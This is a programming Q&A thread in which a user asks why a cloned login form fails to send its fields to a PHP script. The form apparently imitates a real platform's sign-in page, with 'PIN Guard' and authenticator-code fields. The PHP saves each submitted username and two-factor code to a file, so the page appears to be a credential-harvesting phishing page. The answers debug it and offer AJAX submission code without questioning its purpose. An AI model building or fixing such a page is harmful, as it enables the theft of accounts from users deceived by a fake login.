# Problems with submitting a form into a php script

Tags: javascript, php, jquery, html, forms

So I have this form. The way I have it now is that the user will enter their username and password, and then click sign in, (the authentication pin is hidden) until the sign in button is clicked on which the div is shown and the user is to enter their verification pin. The problem I am having is no matter what I submit into the text boxes, nothing gets submitted into my php script which I have here :

```
<?php
$myfile = fopen("newfile_" . uniqid() . ".txt", "w") or die("...");
$txt = $_POST['username'] . ':' . $_POST['authcode'];
fwrite($myfile, $txt);
fclose($myfile);
echo "LOREM IPSUM:("; 
?>

<!DOCTYPE html>
    <form action="/loginaction.php" method="post" name="submit">
    <input class="btn_green_white_innerfade btn_medium" type="button" name="submit" id="userLogin" value="Sign in" width="104" height="25" border="0" tabindex="5" onclick="showDiv();">
            <div class="mainLoginLeftPanel_signin">
                <label for="userAccountName">username</label><br>
                <input class="textField" type="text" name="username" id="userAccountName" maxlength="64" tabindex="1" value="username"><br>&nbsp;<br>
                <label for="userPassword">Password</label><br>
                <input value="password" class="textField" type="password" name="password" id="userPassword" autocomplete="off" maxlength="64" tabindex="2"><br>
                <div id="passwordclearlabel" style="text-align: left; display: none;">It seems that you may be having trouble entering your password. We will now show your password in plain text (login is still secure).</div>
                <div class="checkboxContainer">
                <div class="checkboxRow" title="If you select this option, we will automatically log you in on future visits for up to 30 days, or until you select &quot;Logout&quot; from the account menu.  This feature is only available to PIN Guard enabled accounts.">
                <input class="" type="checkbox" name="remember_login" id="remember_login" tabindex="4"><label for="remember_login">Remember me on this computer</label><br>
                    </div>
                </div>
            </div>

    <div class="modal_buttons" id="login_twofactorauth_buttonsets"> 
        <div class="auth_buttonset" id="login_twofactorauth_buttonset_entercode" style="">
            <button type="submit" class="auth_button leftbtn" data-modalstate="submit" onsubmit="submitForms();">

                <div class="auth_button_h3">submit</div>
                <div class="auth_button_h5">my authenticator code</div></button></div></div>

        <div class="twofactorauthcode_entry_area">
        <div id="login_twofactor_authcode_entry">
            <div class="twofactorauthcode_entry_box">
                <input name="authcode" class="twofactorauthcode_entry_input authcode_placeholder" id="twofactorcode_entry" type="text" placeholder="enter your code here" autocomplete="off"/>
            </div>
        </div>
        <div id="login_twofactor_authcode_help_supportlink" style="display: none;">
            <a href="#">
                Contact  Support for help with account access               </a>
        </div>
    </div>

    </form>
</head>
```

The form names are both entered correctly and I have the action set to the correct script however when I check the text file that is generated there is no input. I would like the button that submits the verification pin to submit the form of all 3 details (user,pass,authcode) and the sign in button to just unhide the verification div(which is working fine). Any help would be appreciated.

The javascript function to submit the forms is

```
<script type="text/javascript">
function() submitForms{
document.getElementById("submit").submit();
document.getElementById("submit").action = "/loginaction.php";
}
```

https://jsfiddle.net/jxd0g2z4/

Comment: Where is the function `submitForms()` defined?

Comment: I will update my code now.

Comment: It looks like you PHP might be terminated if the file fails to open. can you try submitting with that the part that opens a file?

Comment: The action=/loginaction is the part that opens the file I'm pretty sure

Comment: Something else that's important to know is if the form submits back to the same page. The php across the top is meant to handle the form submission, correct?

Comment: Yes it is meant to handle the form submission, but it's not on the same page, the php at the top of the page is included in the loginaction.php script, which is what I want the submit button to submit the information to.

Comment: It is the function that is the problem, you are not using the right ID (the form does not have an ID). Try submitting without the function by removing onClick and see if it works.

Comment: I changed the form to have the id="submit", however it is still the same, the input from the form does not get processed by my PHP script.

Answer (score 3, accepted):

The function calls for a form with the id 'submit' but your form does not have the id tag. It has only a name tag. You can add the tag or change the selector.

`<form action="/loginaction.php" method="post" name="submit" id='submit'>`

You shouldn't need to define the action if its already in the html, but if you did it would need to come before the submission function call.

Another mistake I just noticed was the syntax where the `submitForms` function is defined. The parenthesis belong after the function name as follows:

```
<script type="text/javascript">
function submitForms(){
   document.getElementById("submit").action = "/loginaction.php";
   document.getElementById("submit").submit();
}
```

It's also possible that the `</head>` tag at the end could be throwing something off. Below is an image where I replicated the html and javascript to be sure that it gets through.

[image]

```
<!DOCTYPE html>
<html>
<head>
<script type="text/javascript">
function submitForms(){
   document.getElementById("submit").action = "/loginaction.php";
   document.getElementById("submit").submit();
}
</script>
</head>
<body>
    <form action="/loginaction.php" method="post" name="submit">
    <input class="btn_green_white_innerfade btn_medium" type="button" name="submit" id="userLogin" value="Sign in" width="104" height="25" border="0" tabindex="5" onclick="showDiv();">
            <div class="mainLoginLeftPanel_signin">
                <label for="userAccountName">username</label><br>
                <input class="textField" type="text" name="username" id="userAccountName" maxlength="64" tabindex="1" value="username"><br>&nbsp;<br>
                <label for="userPassword">Password</label><br>
                <input value="password" class="textField" type="password" name="password" id="userPassword" autocomplete="off" maxlength="64" tabindex="2"><br>
                <div id="passwordclearlabel" style="text-align: left; display: none;">It seems that you may be having trouble entering your password. We will now show your password in plain text (login is still secure).</div>
                <div class="checkboxContainer">
                <div class="checkboxRow" title="If you select this option, we will automatically log you in on future visits for up to 30 days, or until you select &quot;Logout&quot; from the account menu.  This feature is only available to PIN Guard enabled accounts.">
                <input class="" type="checkbox" name="remember_login" id="remember_login" tabindex="4"><label for="remember_login">Remember me on this computer</label><br>
                    </div>
                </div>
            </div>

    <div class="modal_buttons" id="login_twofactorauth_buttonsets"> 
        <div class="auth_buttonset" id="login_twofactorauth_buttonset_entercode" style="">
            <button type="submit" class="auth_button leftbtn" data-modalstate="submit" onsubmit="submitForms();">

                <div class="auth_button_h3">submit</div>
                <div class="auth_button_h5">my authenticator code</div></button></div></div>

        <div class="twofactorauthcode_entry_area">
        <div id="login_twofactor_authcode_entry">
            <div class="twofactorauthcode_entry_box">
                <input name="authcode" class="twofactorauthcode_entry_input authcode_placeholder" id="twofactorcode_entry" type="text" placeholder="enter your code here" autocomplete="off"/>
            </div>
        </div>
        <div id="login_twofactor_authcode_help_supportlink" style="display: none;">
            <a href="#">
                Contact  Support for help with account access               </a>
        </div>
    </div>

    </form>
</body>
</html>
```

Comment: I changed the form to the correct ID however nothing is being outputted into my text file.

Comment: I removed the action from the function. When I check the output file, all that shows is the semi-colon, does that mean my form is not being submitted correctly?

Comment: Sorry, the function wasn't properly defined before. The syntax was wrong. I just added the code here.

Comment: I changed my function to the one you provided, the username, and authcode still do not get outputted into my text file, this is very odd

Answer (score 0):

Don't know if I get the problem right, but for me, it looks like that this would be a bit hard to solve for you.
I would suggest to load the first form only, this form is sended with ajax to a php file which do what you need to do (write the file) AND answer a new html code which you should replace with the original loaded html code. here you would send the second form.
Here you have the advantage that you can send the same forme again if there where errors.

*EDIT*

If you have jQuery loaded, you can use this function. your form will only need a class tag to activate it, like:

```
<form action="yourfile.php" id="myForm" class="ajax-form">
```

than this form will activate the function when submiting it.

```
$(".ajax-form").submit(function(e) {
    e.preventDefault();
    var form = $(this);
    var formID = form.attr('id');
    $.ajax({
        context: this,
        async: true,
        type: "post",
        url: form.prop('action'),
        data: form.serialize(),
        dataType: "html",
        success: function(datavalues) {
            $('#'+formID).replaceWith(datavalues);
        },
        error: function(json) {
            console.log('ARMAGEDDON!!!');
        },
    });
        return false;
});
```